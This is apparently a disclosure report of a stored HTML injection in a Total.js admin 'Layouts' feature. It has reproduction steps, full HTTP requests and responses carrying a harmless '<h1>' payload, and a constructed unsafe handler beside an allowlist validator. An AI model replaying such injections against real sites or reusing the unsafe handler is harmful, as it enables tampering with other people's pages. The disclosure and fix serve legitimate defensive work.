Description
- It was noted that the "Layout" functionality is vulnerable to Stored HTML Injection: HTML submitted in the "html" parameter of a new layout is stored as-is and rendered when the layout is viewed
Stored HTML Injection - Layout Functionality
Steps to Reproduce:
- Log in as a user and visit "Layouts"
- Click "Create" and enter a name for the layout
- Intercept the HTTP POST request and replace the value of the "html" parameter with the Stored HTML Injection payload below
- When the newly created layout is viewed, the payload is rendered
<h1>HTMLi</h1>
// HTTP POST Request - Creating New Layout
POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]
{"schema":"layouts_save","data":{"name":"xss-test-layout-name-test","html":"<h1>HTMLi</h1>"}}
// HTTP POST Response - Creating New Layout
HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:41:53 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 39
{"success":true,"value":"JE6c9M1cB61f"}
// HTTP Request - Triggering the Payload
POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]
{"schema":"layouts_html","data":{"id":"JE6c9M1cB61f"}}
// HTTP Response - Triggering the Payload
HTTP/1.1 200 OK
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:46:18 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 60
{"name":"xss-test-layout-name-test","html":"<h1>HTMLi</h1>"}
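As an added example, not code from the original report or from Total.js: a constructed save handler in the shape of the reported behaviour (stores the posted "html" value unchanged) beside a hardened variant that validates the field against a tag and attribute allowlist and refuses the save on any finding. The allowlists, the `layoutsSave*` function names and the id format are assumptions; the allowlist would be tuned to the tags the layout editor actually needs.

```javascript
// Added example, not code from the original report or from Total.js.
// Allowlists and function names are assumptions for illustration.
const ALLOWED_TAGS = new Set(['div', 'section', 'header', 'footer', 'main',
  'p', 'span', 'br', 'ul', 'ol', 'li', 'a']);
const ALLOWED_ATTRS = new Set(['class', 'id', 'href']);
const TAG_RE = /<\s*(\/?)\s*([a-zA-Z][\w:-]*)([^>]*)>/g;
const ATTR_RE = /([^\s=\/]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;

// Validate a layout's "html" field: reject (do not silently strip) anything
// outside the allowlists, any non-allowlisted attribute and unsafe URL schemes.
function validateLayoutHtml(html) {
  const problems = new Set();
  if (/<!--|<!\[CDATA\[|<\?/.test(html)) problems.add('comments or PIs not allowed');
  TAG_RE.lastIndex = 0;
  let m;
  while ((m = TAG_RE.exec(html)) !== null) {
    const [, closing, rawName, rawAttrs] = m;
    const name = rawName.toLowerCase();
    if (!ALLOWED_TAGS.has(name)) { problems.add(`tag <${name}> not allowed`); continue; }
    if (closing) continue;               // closing tags carry no attributes
    ATTR_RE.lastIndex = 0;
    let a;
    while ((a = ATTR_RE.exec(rawAttrs)) !== null) {
      const attr = a[1].toLowerCase();
      if (!ALLOWED_ATTRS.has(attr)) { problems.add(`attribute "${attr}" on <${name}> not allowed`); continue; }
      // Strip quotes, whitespace and control characters before checking the scheme.
      const value = (a[2] || '').replace(/^["']|["']$/g, '').replace(/[\s\u0000-\u001f]/g, '');
      if (attr === 'href' && /^(javascript|vbscript|data):/i.test(value)) problems.add('unsafe href scheme');
    }
  }
  return { ok: problems.size === 0, problems: [...problems] };
}

// Save handler in the shape of the reported behaviour: stores whatever was posted.
function layoutsSaveUnsafe(store, data) {
  const id = 'layout-' + (store.size + 1);          // constructed id format
  store.set(id, { name: data.name, html: data.html });
  return { success: true, value: id };
}

// Hardened variant: validate first and refuse the save on any finding.
function layoutsSaveValidated(store, data) {
  const result = validateLayoutHtml(String(data.html || ''));
  if (!result.ok) return { success: false, error: result.problems };
  return layoutsSaveUnsafe(store, data);
}
```

With the strict allowlist above, the report's `<h1>HTMLi</h1>` payload is refused by `layoutsSaveValidated` while the unsafe handler stores it and returns `success: true`, mirroring the response shown in the report.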